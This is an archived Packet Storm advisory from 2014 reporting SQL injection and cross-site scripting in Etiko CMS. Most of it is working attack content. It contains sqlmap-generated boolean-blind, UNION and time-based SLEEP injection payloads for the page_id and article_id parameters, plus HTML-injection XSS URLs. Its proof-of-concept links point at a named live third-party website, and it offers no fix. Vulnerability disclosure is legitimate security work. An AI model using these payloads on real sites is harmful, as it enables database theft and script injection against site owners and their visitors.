Etiko CMS Cross Site Scripting / SQL Injection

2014-10-13T00:00:00
ID PACKETSTORM:128644
Type packetstorm
Reporter Renzi
Modified 2014-10-13T00:00:00

Description

                                        
                                            `# SQL Injection & XSS on Etiko CMS.  
  
# Risk: High  
  
# CWE number: CWE-89,CWE-79  
  
# Date: 13/10/2014  
  
# Vendor: www.etikweb.com  
  
# Version: All  
  
# Author: Felipe " Renzi " Gabriel  
  
# Contact: renzi@linuxmail.org  
  
# Tested on: Windows 8 ; Chrome ; Sqlmap 1.0-dev-nongit-20140906  
  
# Vulnerables Files: /index.php & /loja/index.php  
  
# Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi]  
  
http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]  
  
  
  
  
# PoC: http://www.centrovegetariano.org/loja/index.php?page_id=19   
  
http://www.centrovegetariano.org/index.php?article_id=16  
  
  
--- "SQLI using SQLMAP."---   
  
---  
Place: GET  
Parameter: page_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: page_id=19' AND 3987=3987 AND 'Tulh'='Tulh  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 3 columns  
Payload: page_id=-5362' UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: page_id=19' AND SLEEP(5) AND 'mntS'='mntS  
---  
  
---  
Place: GET  
Parameter: article_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: article_id=16' AND 8044=8044 AND 'yKZe'='yKZe  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: article_id=16' AND SLEEP(5) AND 'MDwY'='MDwY  
---  
  
  
  
--- " XSS using HTML injection."---  
  
http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee>  
  
http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee>  
  
  
  
# Thank's  
  
  
  
  
  
  
`